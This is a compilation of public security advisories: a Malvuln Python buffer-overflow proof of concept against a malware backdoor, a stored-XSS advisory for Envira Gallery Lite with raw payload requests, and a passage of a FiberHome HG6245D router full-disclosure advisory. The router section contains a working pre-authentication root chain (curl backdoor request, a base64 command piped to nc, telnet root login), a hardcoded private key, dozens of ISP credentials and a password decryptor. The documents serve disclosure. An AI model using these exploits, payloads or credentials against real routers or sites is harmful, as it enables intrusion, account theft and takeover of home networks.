004ff920 0002d1d2 crss+0x1d1d2
004ff938 764ee0bb user32!_InternalCallWinProc+0x2b
004ff964 764f8849 user32!InternalCallWinProc+0x20
004ff988 764fb145 user32!UserCallWinProcCheckWow+0x1be
004ffa58 764e90dc user32!DispatchMessageWorker+0x4ac
004ffac4 764e38c0 user32!DispatchMessageA+0x10
004ffacc 0006b6f4 crss+0x5b6f4
004ffb6c 0007b1c2 crss+0x6b1c2
004ffb94 0007ce34 crss+0x6ce34
004ffbd8 0007e141 crss+0x6e141
004ffc10 0007e252 crss+0x6e252
004ffc44 0007ecd7 crss+0x6ecd7
004ffc7c 0007dbdc crss+0x6dbdc
004ffccc 000a1115 crss+0x91115
004ffd2c 000a1b8c crss+0x91b8c
004ffde4 00064483 crss+0x54483
004ffe08 00064163 crss+0x54163
004fff4c 0006b864 crss+0x5b864
004fff70 000a8450 crss+0x98450
004fff88 76e38654 kernel32!BaseThreadInitThunk+0x24
004fff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f
004fffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_NAME: user32!_InternalCallWinProc+0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: user32
IMAGE_NAME: user32.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 0
STACK_COMMAND: .cxr 00000000004FEB58 ; kb ; dds 4fefb8 ; kb
FAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_user32.dll!_InternalCallWinProc
Exploit/PoC:
from socket import *
import time
MALWARE_HOST="x.x.x.x"
PORT=21220
sz = 2000
c=1
def doit():
global c, sz
while True:
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.settimeout(0.2)
sz += 1000
JUNK="A"*sz
PAYLOAD="TRACE /"+JUNK+" HTTP/1.1\r\nHTTP/1.0-99999\r\nHost: "+JUNK+"\r\n\r\n"
s.send(PAYLOAD)
s.close()
time.sleep(0.2)
c+=1
if c==60:
print("Backdoor.Win32.Kurbadur.a / Remote Stack Buffer Overflow")
print("MD5: 821d3d5a9b15dc3388fe17f233cce296")
print("By Malvuln")
break
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Envira Gallery Lite edition version 1.8.3.2 suffers from a cross site scripting vulnerability.
4f29341ba3923a4083599b429f88437b==== [Tempest Security Intelligence - ADV-12/2020]
=============================
Envira Gallery - Lite Edition - Version 1.8.3.2
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
===== [Table of Contents] ================================================
• Overview
• Detailed description
• Disclosure timeline
• Acknowledgements
• References
===== [Vulnerability Information]
===========================================
Category: Improper Neutralization of an Input while Generating a Web Page.
('Cross-site Scripting') [CWE-79]
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
===== [Overview] ======================================================
Affected system: Envira Gallery – Lite Edition
Software version: Lite - 1.8.3.2
Impacts: The browser of the end-user doesn't have a way to know whether the
script should be trusted or not, and ends up executing it. Since the
browser believes that the script is from a trusted source, it can access
any cookies, session tokens, and other sensitive information that is
retained by the browser and used on the website. The script can also be
used to redirect the victim into a malicious website, in order to perform a
phishing attack or steal information.
==== [Detailed description] ================================================
Envira Gallery Lite Edition - Version 1.8.3.2 is vulnerable to an XSS that
is stored through the meta[title] parameter and a second XSS, which is
stored through the post_title parameter.
[1]- XSS located at http://localhost:8080/wp-admin/post.php and stored
through the post_title parameter:
To exploit the XSS through POST, insert a single char in the endpoint
post.php and in the parameter post_title, then close the current by
including a javascript payload. As showed on the example bellow:
POST /wp-admin/post.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1771
Origin: http://localhost:8080
Connection: close
Cookie: [cookies]
_wpnonce=2671a27a51&_wp_http_referer=/wp-admin/post.php?post=2933&action=edit&user_ID=2&action=editpost&originalaction=editpost&post_author=2&post_type=envira&original_post_status=publish&referredby=
http://localhost:8080/wp-admin/edit.php?post_type=envira&_wp_original_http_referer=http://localhost:8080/wp-admin/edit.php?post_type=envira&post_ID=2933&meta-box-order-nonce=3751b8aa86&closedpostboxesnonce=d58bcab0d3&post_title=nf3
"onfocus="alert(2)"autofocus="n3fx8&samplepermalinknonce=24f9403378&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=16&aa=2020&hh=14&mn=22&ss=03&hidden_mm=12&cur_mm=12&hidden_jj=16&cur_jj=16&hidden_aa=2020&cur_aa=2020&hidden_hh=14&cur_hh=20&hidden_mn=22&cur_mn=09&original_publish=Update&save=Update&_envira_gallery[type]=default&async-upload=&post_id=2933&envira-gallery=031bef86cc&_wp_http_referer=/wp-admin/post.php?post=2933&action=edit&_envira_gallery[type_default]=1&_envira_gallery[columns]=0&_envira_gallery[lazy_loading]=1&_envira_gallery[lazy_loading_delay]=500&_envira_gallery[justified_row_height]=150&_envira_gallery[justified_margins]=1&_envira_gallery[gallery_theme]=base&_envira_gallery[gutter]=10&_envira_gallery[margin]=10&_envira_gallery[image_size]=default&_envira_gallery[crop_width]=640&_envira_gallery[crop_height]=480&_envira_gallery[lightbox_enabled]=1&_envira_gallery[lightbox_theme]=base&_envira_gallery[lightbox_image_size]=default&_envira_gallery[title_display]=float&_envira_gallery[title]=nf3&_envira_gallery[slug]=change-the-gallery-title&_envira_gallery[classes]=
[2]- XSS stored at [/wp-admin/admin-ajax.php]
To exploit the XSS through POST, insert a single char in the endpoint
wp-admin/admin-ajax.php and in the parameter meta[title], close the current
one by inserting a double quote ("), and then insert a javascript payload.
As showed on the example bellow:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/post.php?post=2931&action=edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://localhost:8080
Connection: close
Cookie: [cookies]
nonce=bb7f61ad8e&post_id=2931&attach_id=2937&meta[id]=2937&meta[title]=bug"onmousemove="alert(document.cookie)&meta[caption]=&meta[alt]=&meta[link]=&meta[status]=active&meta[src]=&meta[thumb]=&meta[_thumbnail]=&action=envira_gallery_save_meta
==== [Disclosure timeline] ================================================
17/Dez/2020 – Initiated the responsible disclosure with the vendor.
17/Dez/2020 - Envira Gallery confirmed the issue.
18/Dez/2020 - The vendor fixed the vulnerability on the first XSS.
19/Dez/2020 - The vendor fixed the vulnerability on the second XSS.
22/May/2020 - CVEs were assigned and reserved as CVE-2020-35581,
CVE-2020-35582
=====[Acknowledgements]======================================= ========
Tempest Security Intelligence [5]
==== [References] ======================================================
[1][ https://cwe.mitre.org/data/definitions/79.html
[2][
https://github.com/enviragallery/envira-gallery-lite/commit/3b081dd10a1731f8cd981bebeac0e775fb217acf
]
[4][
https://github.com/enviragallery/envira-gallery-lite/commit/102651514e6faca914ec1c7e113def340d8e1e09
]
[5][ https://www.tempest.com.br
==== [EOF] ===========================================================
--
FiberHome HG6245D routers suffer from bypass, hard-coded credentials, password disclosure, privilege escalation, denial of service, remote stack overflow, and additional vulnerabilities. suffers from bypass, cross site scripting, denial of service, and privilege escalation vulnerabilities.
64f5abcb1d25b607eec98356b1ed6c6eHello,
Please find a text-only version below sent to security mailing lists.
The complete version on "Multiple vulnerabilities found in FiberHome
HG6245D routers"
is posted here:
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
=== text-version of the advisory ===
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
## Advisory Information
Title: Multiple vulnerabilities found in FiberHome HG6245D routers
Advisory URL: https://pierrekim.github.io/advisories/2021-fiberhome-0x00-ont.txt
Blog URL: https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
Date published: 2021-01-12
Vendors contacted: None
Release mode: Full-Disclosure
CVE: None yet assigned
## Product Description
FiberHome Technologies is a leading equipment vendor and global
solution provider in the field of information technology and
telecommunications.
The FiberHome HG6245D routers are GPON FTTH routers. They are mainly
used in South America and
in Southeast Asia (from Shodan). These devices come with competitive
pricing but are very powerful, with a lot of memory and storage.
I validated the vulnerabilities against HG6245D, RP2602:
Config# show version
show version
Hardware version : WKE2.094.277A01
Software version : RP2602
Minor version : 00.00
Basic part version : RP2602
Generate time : Apr 1 2019 19:38:05
Some vulnerabilities have been tested successfully against another
fiberhome device (AN5506-04-FA, firmware RP2631, 4 April 2019). The
fiberhome devices have quite a similar codebase, so it is likely all
other fiberhome devices (AN5506-04-FA, AN5506-04-FAT, AN5506-04-F) are
also vulnerable.
On the first analysis, attack surface is not huge:
- - only HTTP/HTTPS is listening by default on the LAN
- - It is also possible to enable a CLI telnetd (not reachable by
default) on port 23/tcp by using hardcoded credentials on the web
admin interface (`https://target/fh`).
Futhermore, due to the lack of firewall for IPv6 connectivity, all the
internal services will be reachable over IPv6 (from the Internet).
It is in fact trivial to achieve pre-auth RCE as root against the
device, from the WAN (using IPv6) and from the LAN (IPv4 or IPv6).
This scenario involves reaching the webserver to:
1. enable a proprietary CLI telnetd (using backdoor credentials for
HTTP or using the backdoor `/telnet` HTTP API or using a stack
overflow in the HTTP server in previous fiberhome routers [and
skipping next steps])
2. enable the Linux telnetd using authentication bypass or with
backdoor credentials
3. use backdoor credentials to get a root shell on the Linux telnetd
Example of such scenario in 4 steps from a different network:
$ curl -k https://target/info.asp # pre-auth infoleak, extract the
WAN MAC, very similar to the br0 MAC, used to enable the next
backdoor. On the same network segment, use `arp -na`
$ curl -k 'https://target/telnet?enable=1&key=ENDING_PART_MAC_ADDR'
# backdoor access to authorize access to CLI telnet on port 23/tcp
$ echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc
target 23 >/dev/null & # auth bypass + start of Linux telnetd on port
26/tcp
$ telnet target 26 # backdoor root access with root / GEPON
(none) login: root
Password: [GEPON]
BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
#id
uid=0(root) gid=0 groups=0 # game over
Please note this research was done in the beginning of 2020 and a new
firmware image may be available and may patch some vulnerabilities
(even if I highly doubt it). This research was supposed to be
presented during a private security event last year which was
postponed due to the COVID-19 situation.
Full-disclosure is applied as it is believed that some backdoors have
been intentionally placed by the vendor.
Also, it is public knowledge from 2019 that Fiberhome devices have
weak passwords and RCE vulnerabilities. This quote is from 2019
(https://blog.netlab.360.com/some-fiberhome-routers-are-being-utilized-as-ssh-tunneling-proxy-nodes-2/):
> We didn't see how Gwmndy malware spread, but we know that some Fiberhome router Web systems have weak passwords and there are RCE vulnerabilities.
## Vulnerabilities Summary
The summary of the vulnerabilities is:
1. Insecure IPv6 connectivity
2. HTTP Server - Passwords in HTTP logs
3. HTTP Server - Harcoded SSL certificates
4. HTTP server - Pre-auth InfoLeak
5. HTTP Server - Backdoor allowing telnet access
6. HTTP Server - Hardcoded credentials
7. HTTP Server - TR-069 hardcoded credentials
8. HTTP Server - Credentials decryption algorithm
9. Telnet server (Linux) - Hardcoded credentials
10. Telnet server (CLI) - Hardcoded credentials
11. Telnet server (CLI) - Privilege escalation
12. Telnet server (CLI) - Authentication bypass
13. Telnet server (CLI) - Authentication bypass to start the Linux telnetd
14. Telnet server (CLI) - DoS
15. System - Credentials stored in clear-text
16. System - Passwords stored in clear-text in nvram
17. Misc - Remote stack overflow in the HTTP server (AN5506-04-FA / RP2631)
I removed several DoS and strange technical details (linked to
undisclosed vulnerabilities) for clarity.
## Details - Insecure IPv6 connectivity
By default, there are no firewall rules for the IPv6 connectivity,
exposing the internal management interfaces from the Internet.
An attacker can get a full access to the management http server (using
hardcoded passwords) and the telnet services, by reaching the IPv6s
assigned to the wan0 and the br0 interfaces.
On the device:
#ifconfig wan0
wan0 Link encap:Ethernet HWaddr [REMOVED]
[...]
inet6 addr: [REMOVED]/64 Scope:Global
[...]
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
#ifconfig br0
br0 Link encap:Ethernet HWaddr [REMOVED]
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: [REMOVED]/64 Scope:Global
[...]
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
`br0` is the internal network interface assigned to the LAN.
All the services are binding to both `br0` and `wan0`.
It is trivial to reach services from the WAN (Internet), by contacting
IPv6 used by `br0` or `wan0`:
- From the WAN:
rasp-wan-olt% telnet [ipv6] 26
Trying [ipv6]...
Connected to [ipv6].
Escape character is '^]'.
(none) login:
telnet> q
Connection closed.
rasp-wan-olt% telnet [ipv6] 80
Trying [ipv6]...
Connected to [ipv6].
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 302 Redirect
Server: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.4.2-OPEN
Date: Mon Jan 7 21:01:29 2020
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Location: https://
<html><head></head><body>
This document has moved to a new <a
href="https://">location</a>.
Please update your documents to reflect the new location.
</body></html>
Connection closed by foreign host.
rasp-wan-olt%
By using `ip6tables` on the device, we can confirm the complete lack
of firewall rules for IPv6 connectivity:
#ip6tables -nL
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
forward_ext_ip all ::/0 ::/0
forward_ext_url all ::/0 ::/0
forward_ext_mac all ::/0 ::/0
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain forward_ext_ds_ip (1 references)
target prot opt source destination
Chain forward_ext_ip (1 references)
target prot opt source destination
forward_ext_us_ip all ::/0 ::/0
forward_ext_ds_ip all ::/0 ::/0
Chain forward_ext_mac (1 references)
target prot opt source destination
Chain forward_ext_url (1 references)
target prot opt source destination
Chain forward_ext_us_ip (1 references)
target prot opt source destination
#
I highly recommend disabling IPv6 connectivity.
## Details - HTTP Server - Passwords in HTTP logs
It is possible to find passwords and authentication cookies stored in
clear-text in HTTP logs:
#cat /fhconf/web_log/web.log
web_utils>2020-01-07
19:16:26,../utils/cu_sessionManagement.c[465](findUser): no user named
admin !
<web_custom>2020-01-07
19:16:27,../custom/weblogin.c[595](webLogin):
*************userGroupName = 1
<web_init>2020-01-07
19:16:27,../utils/utils.c[1399](get_admin_default_info): enter
get_admin_default_info
<web_custom>2020-01-07
19:16:27,../custom/weblogin.c[812](webLogin): Warning! Password error!
password = [REMOVED]
<web_utils>2020-01-07
19:27:24,../utils/cu_sessionManagement.c[238](createSession): create
user [REMOVED]
## Details - HTTP Server - Harcoded SSL certificates
The web management is done over HTTPS, using a hardcoded private key
with 777 permissions:
#ls -la /fhrom/bin/web/certSrv.pem /fhrom/bin/web/privkeySrv.pem
-rwxrwxrwx 1 root 0 883 Apr 1 2019
/fhrom/bin/web/certSrv.pem
-rwxrwxrwx 1 root 0 887 Apr 1 2019
/fhrom/bin/web/privkeySrv.pem
#cat /fhrom/bin/web/privkeySrv.pem
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCY22+N/5InUhmotgU8jh9nQdyTmKYwFJKpvMek9fJK8rCsrED7
yl+mvUPv3yqLyMgvu1AcMmYEyngpbw94rnd2k91wiRGUGUSq8mTRPFwnplTPI8hI
JglMsKcskzRP951jxsiSS1eMlLcEd9iMUcpjUbgWzxKH0fFlRD5d8jYPtwIDAQAB
AoGANEjy6n5d7sc9caD5P5JZmYdEvNO9HLscw6SIIZvjCdHjrtyoybeaaj1ZDKao
NfIyz2jh6RMwJDlhSsLrZts+jzB+k7fAqUkdLi6fkZmpamL1OEHMqzWdWuVFgCjd
uf8ZMMuQ+/3gx/tjjG0sBuL/ko1Q7oxoIty+4xm9cwqGGtkCQQDKIJYYp9385gk4
8qDcdgnc39kmsheUB5VS0pU1/pxL2YIJltq79yghwQisaNsUUk4LMW6hNyPx7Knx
jRpHLsgTAkEAwZkVbjo3Ll+fM+1oPPcY4i960DURrR9eMVhq771n+GzCs9gEy2Ea
HW5f0yamZBMURZWECu1W0s764QkHXwzWTQJAaYGi95HAVT86NyinAQz4TvvlnMY/
enyO3GGhk0KpEQqjTyAYYx87KotZXK2LFct0g3E1Hx/qOmDfwH935QotUwJAH4mE
iDRLkO5azOa7uFK4ZwA9DXXXr1AQ1BEHOo6sRTfSb+GcxlTHIEw+p/L/4AWLo9o7
bFxFbInzLH2ACefZcQJAJ+US+g9Dp4tiLrenketRv9+3nOPGod2WOGqjMaEqOgmC
RjGu2aI9YguR3FuX3W9KOOg3EDn/l/O1XynBPRO9Aw==
-----END RSA PRIVATE KEY-----
#cat /fhrom/bin/web/certSrv.pem
-----BEGIN CERTIFICATE-----
MIICXzCCAcgCCQCqr5AgCgFdqzANBgkqhkiG9w0BAQUFADB0MQswCQYDVQQGEwJD
SDELMAkGA1UECBMCSFUxCzAJBgNVBAcTAldVMQswCQYDVQQKEwJGSDELMAkGA1UE
CxMCU0YxDDAKBgNVBAMTA1BPTjEjMCEGCSqGSIb3DQEJARYUUE9OQEZJQkVSSE9N
RS5DT00uQ04wHhcNMTMwNDI0MDEyMTUwWhcNMjMwNDIyMDEyMTUwWjB0MQswCQYD
VQQGEwJDSDELMAkGA1UECBMCSFUxCzAJBgNVBAcTAldVMQswCQYDVQQKEwJGSDEL
MAkGA1UECxMCU0YxDDAKBgNVBAMTA1BPTjEjMCEGCSqGSIb3DQEJARYUUE9OQEZJ
QkVSSE9NRS5DT00uQ04wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJjbb43/
kidSGai2BTyOH2dB3JOYpjAUkqm8x6T18krysKysQPvKX6a9Q+/fKovIyC+7UBwy
ZgTKeClvD3iud3aT3XCJEZQZRKryZNE8XCemVM8jyEgmCUywpyyTNE/3nWPGyJJL
V4yUtwR32IxRymNRuBbPEofR8WVEPl3yNg+3AgMBAAEwDQYJKoZIhvcNAQEFBQAD
gYEACZJepEU36h3PMc0O15Bo7zkBWm2dD0RbTrJeZF561VcxlpuE2GDirNCXAbZz
Ue/x+fDQBEM8kqpFYcVMPzZBUdFwu1QIY0DottXVcFFNoKS54GL9LEMaS6l6R/D5
G8bCy/RF3kZwzE2cflZ7x78zdpQpzzDcOD415ek5zkadhu0=
-----END CERTIFICATE-----
#
Another hardcoded private key is also available (?!) in
`/fhrom/bin/web` and can be downloaded over HTTPS:
#ls -la /fhrom/bin/web/privkeySrv.pem
-rwxrwxrwx 1 root 0 887 Apr 1 2019
/fhrom/bin/web/privkeySrv.pem
$ curl -k https://192.168.1.1/privkeySrv.pem
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCY22+N/5InUhmotgU8jh9nQdyTmKYwFJKpvMek9fJK8rCsrED7
yl+mvUPv3yqLyMgvu1AcMmYEyngpbw94rnd2k91wiRGUGUSq8mTRPFwnplTPI8hI
JglMsKcskzRP951jxsiSS1eMlLcEd9iMUcpjUbgWzxKH0fFlRD5d8jYPtwIDAQAB
AoGANEjy6n5d7sc9caD5P5JZmYdEvNO9HLscw6SIIZvjCdHjrtyoybeaaj1ZDKao
NfIyz2jh6RMwJDlhSsLrZts+jzB+k7fAqUkdLi6fkZmpamL1OEHMqzWdWuVFgCjd
uf8ZMMuQ+/3gx/tjjG0sBuL/ko1Q7oxoIty+4xm9cwqGGtkCQQDKIJYYp9385gk4
8qDcdgnc39kmsheUB5VS0pU1/pxL2YIJltq79yghwQisaNsUUk4LMW6hNyPx7Knx
jRpHLsgTAkEAwZkVbjo3Ll+fM+1oPPcY4i960DURrR9eMVhq771n+GzCs9gEy2Ea
HW5f0yamZBMURZWECu1W0s764QkHXwzWTQJAaYGi95HAVT86NyinAQz4TvvlnMY/
enyO3GGhk0KpEQqjTyAYYx87KotZXK2LFct0g3E1Hx/qOmDfwH935QotUwJAH4mE
iDRLkO5azOa7uFK4ZwA9DXXXr1AQ1BEHOo6sRTfSb+GcxlTHIEw+p/L/4AWLo9o7
bFxFbInzLH2ACefZcQJAJ+US+g9Dp4tiLrenketRv9+3nOPGod2WOGqjMaEqOgmC
RjGu2aI9YguR3FuX3W9KOOg3EDn/l/O1XynBPRO9Aw==
-----END RSA PRIVATE KEY-----
## Details - HTTP server - Pre-auth InfoLeak
It is possible to extract information from the device without
authentication by disabling Javascript and visiting `/info.asp`:
$ curl -k https://192.168.1.1/info.asp
[..]
Software Version: [REMOVED]
[...]
ONU State: [REMOVED]
Regist State: [REMOVED]
LOID: [REMOVED] <----------- Secret used for FTTH connection
[...]
IP Address: [REMOVED]
Subnet Mask: [REMOVED]
IPv6 Address: [REMOVED]
DHCP Clients List: [REMOVED]
Wan IP: [REMOVED]
WAN Mac: [REMOVED] <-------- Used for the telnet backdoor
[...]
Also, it is very easy to guess the MAC address of the `br0` interface
based on the WAN MAC address (e.g.: `wan0`: `xx:xx:xx:xx:xx:x3`, `br0`
will be `xx:xx:xx:xx:xx:x0`).
## Details - HTTP Server - Backdoor allowing telnet access
In order to reach the telnetd CLI server, it is also possible to reach
a backdoor API without authentication provided by the HTTP server.
This will remove firewall rules and allow an attacker to reach the
telnet server (used for CLI).
This backdoor can be found inside the `webs` binary:
- From `sub_C46F8()` (called from main()):
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
The `backdoor_telnet()` function (named during reverse engineering,
the original name is unknown):
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
We can reverse the function `omci_set_telnet_uni_state()` from
`libgl3_advance.so`:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
On line 24, rules will be added depending of the value of the argument
of this function.
Finally, the `getOnuMac()` function will provide a custom valid entry
from the MAC address of the `br0` interface:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
The backdoor is reachable by sending a HTTPS request:
- - https://[ip]/telnet?enable=0&key=calculated(BR0_MAC)
The 'secret' algorithm will extract the ending part of the mac address.
For the MAC: AA:AA:AA:01:02:03, an attacker can enable the backdoor by sending:
$ curl -k 'https://[ip]/telnet?enable=1&key=010203'
Opening the access to the telnetd:
$ curl -k 'https://192.168.1.1/telnet?enable=1&key=[REMOVED]'
Open telnet success!
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
------acl IP:192.168.1.2 --------
Login:
telnet> q
Connection closed.
Closing the access to the telnetd:
$ curl -k 'https://192.168.1.1/telnet?enable=0&key=[REMOVED]'
$ telnet 192.168.1.1 23
Trying 192.168.1.1...
telnet: connect to address 192.168.1.1: Connection refused
telnet: Unable to connect to remote host
The IPv4 firewall rules before and after triggering the backdoor:
Access is being blocked:
#iptables-save |grep telnet
:input_ext_access_telnet_ani - [0:0]
:input_ext_access_telnet_uni - [0:0]
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_uni
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_ani
-A input_ext_access_telnet_ani -i tel0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -i br0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -p tcp -m tcp --dport 23 -j REJECT
--reject-with tcp-reset
-A input_ext_access_telnet_uni -i br0 -p tcp -m tcp --dport 23 -j
REJECT --reject-with tcp-reset
Access is allowed:
#iptables-save |grep telnet
:input_ext_access_telnet_ani - [0:0]
:input_ext_access_telnet_uni - [0:0]
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_uni
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_ani
-A input_ext_access_telnet_ani -i tel0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -i br0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -p tcp -m tcp --dport 23 -j REJECT
--reject-with tcp-reset
## Details - HTTP Server - Hardcoded credentials
The web daemon contains a list of hardcoded credentials, for different ISPs:
- - user / user1234
- - f~i!b@e#r$h%o^m*esuperadmin / s(f)u_h+g|u
- - admin / lnadmin
- - admin / CUadmin
- - admin / admin
- - telecomadmin / nE7jA%5m
- - adminpldt / z6dUABtl270qRxt7a2uGTiw
- - gestiontelebucaramanga / t3l3buc4r4m4ng42013
- - rootmet / m3tr0r00t
- - awnfibre / fibre@dm!n
- - trueadmin / admintrue
- - admin / G0R2U1P2ag
- - admin / 3UJUh2VemEfUtesEchEC2d2e
- - admin / getOnuMac(s, 6, 32); <- last part of the MAC address of
the `br0` interface
- - admin / 888888
- - L1vt1m4eng / 888888
- - useradmin / 888888
- - user / 888888
- - admin / 1234
- - user / tattoo@home
- - admin / tele1234
- - admin / aisadmin
You can find the incomplete list below:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
I really like `m3tr0r00t` :)
There are passwords everywhere in the `webs` binary (HTTP Server).
These credentials, used with `https://ip/fh` will allow to open the
access to the CLI telnet on port 23/tcp.
## Details - HTTP Server - TR-069 hardcoded credentials
We can find hardcoded credentials inside the `webs` binary for TR-069:
`telecomadmin`
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
## Details - HTTP Server - Credentials decryption algorithm
By default, some credentials appear to be encrypted (in
`/fhconf/umconfig.txt` file).
It is possible to decrypt them using the encryption function found
inside the webs binary. This algorithm uses mainly xor with the
hardcoded key `*j7a(L#yZ98sSd5HfSgGjMj8;Ss;d)(*&^#@$a2s0i3g` so we can
encrypt passwords and decrypt "encrypted" passwords:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
A re-implementation in C can be shown below:
#include <stdio.h>
#include <string.h>
int main(int argc,
char **argv,
char **envp)
{
char key[45] = "*j7a(L#yZ98sSd5HfSgGjMj8;Ss;d)(*&^#@$a2s0i3g";
char password[12] = "\x59\x42\x51\x48\x5d\x13\x4b\x52\x3d\x45\x4d\x00";
//char password[12] = "s(f)u_h+g|u\x00";
unsigned char encrypted_char;
for (int i = 0; i < strlen(password); i++)
{
encrypted_char = password[i] ^ key[i % sizeof(key)];
if (encrypted_char && !(encrypted_char & 0x2000))
printf("%c", encrypted_char);
}
printf("\n");
return (0);
}
And it works:
$ cc decrypt-passwords-umconfig.c -o decrypt-passwords-umconfig &&
./decrypt-passwords-umconfig | hexdump -C
00000000 73 28 66 29 75 5f 68 2b 67 7c 75 0a |s(f)u_h+g|u.|
0000000c
Interesting fact: we previously found this hardcoded key in FTTH OLTs
from another FTTH vendor:
https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html#weak-encryption-algorithm
It appears this key and this algorithm come from GoAhead:
https://github.com/BruceYang-yeu/goahead-1/blob/master/um.c#L51
## Details - Telnet server (Linux) - Hardcoded credentials
A hardcoded password for root is being defined inside
`/etc/init.d/system-config.sh`:
#cat /etc/init.d/system-config.sh
#!/bin/sh
case "$1" in
start)
echo "Configuring system..."
# these are some miscellaneous stuff without a good home
mount -o remount,sync /fhconf
mkdir -p /dev/shm/fhdrv_kdrv_ver_tmp
/dev/shm/usr_tmp /fhconf/data
echo "root:W/xa5OyC3jjQU:0:0:root:/:bin/sh"> /etc/passwd
echo "nobody:x:99:99:Nobody:/:/bin/false">> /etc/passwd
ifconfig lo 127.0.0.1 netmask 255.0.0.0 broadcast
127.255.255.255 up
echo > /var/udhcpd/udhcpd.leases
exit 0
;;
# cat /etc/passwd
root:W/xa5OyC3jjQU:0:0:root:/:bin/sh
nobody:x:99:99:Nobody:/:/bin/false
`W/xa5OyC3jjQU` is the DES encrypted data for `GEPON`.
This telnet server doesn't run by default but it is possible to start
it from the telnet CLI.
## Details - Telnet server (CLI) - Hardcoded credentials
telnet on port 23/tcp can be also abused with these credentials:
- - `gpon`/`gpon`
- - enable: `gpon`
$ nc -v 192.168.1.1 23
Connection to 192.168.1.1 23 port [tcp/telnet] succeeded!
------acl IP:192.168.1.2 --------
Login: gpon
gpon
Password: gpon
User> enable
enable
Password: gpon
****
Config#
We can retrieve these backdoors by reversing the
`libci_adaptation_layer.so` library:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
For specific ISPs, there are these valid credentials:
- - `admin` / 4 hexadecimal chars, generated in the
